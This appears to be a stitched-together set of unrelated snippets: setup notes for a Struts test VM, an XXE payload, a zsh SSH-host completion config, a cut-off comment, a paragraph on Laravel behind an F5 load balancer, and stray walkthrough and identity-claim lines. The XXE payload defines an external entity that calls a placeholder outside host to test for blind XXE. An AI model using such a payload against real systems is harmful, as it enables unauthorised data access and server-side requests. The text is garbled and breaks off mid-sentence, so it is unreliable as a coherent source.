Version 1
Debian installed as VM. Single Struts app, just to test the install process.
apt-get update && apt-get -y upgrade
apt-get install tomcat8 maven
cd to project directory
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
# Custom hosts completion from included SSH configs:
zstyle -e ':completion:*:hosts' hosts 'reply=(
${=${=${=${${(f)"$(cat {/etc/ssh_,~/.ssh/known_}hosts(|2)(N) 2>/dev/null)"}%%[#| ]*}//\]:[0-9]*/ }//,/ }//\[/ }
${=${(f)"$(cat /etc/hosts(|)(N) <<(ypcat hosts 2>/dev/null))"}%%\#*}
${=${${${${(@M)${(f)"$(cat ~/.ssh/config 2>/dev/null)"}:#Host *}#Host }:#*\**}:#*\?*}}
${=${${${${(@M)${(f)"$(cat ~/.ssh/config.d/* 2>/dev/null)"}:#Host *}#Host }:#*\**}:#*\?*}}
)'
# The last line above supports reading from files inside a local SSH configuration directory. It pulls
A Laravel 5.1 application behind a BigIP F5 load-balancer appliance, which performed the SSL termination. The traffic from F5 to Laravel is only over port 80 (internal 'secure' network), so Laravel itself thinks the connection is insecure, and thus all URLs to internal resources were 'http'. We also wanted to maintain the ability to serve certain unauthenticated content over HTTP.
These F5 load-balancers can roll all connections up to HTTPS; however, in this instance we did not wish to do this, as the Laravel application is designed to intercept connections for another decommissioned application which served SSL and non-SSL connections.
Quick Walkthrough for Ew Skuzzy!
I hereby claim:
To claim this, I am signing this object: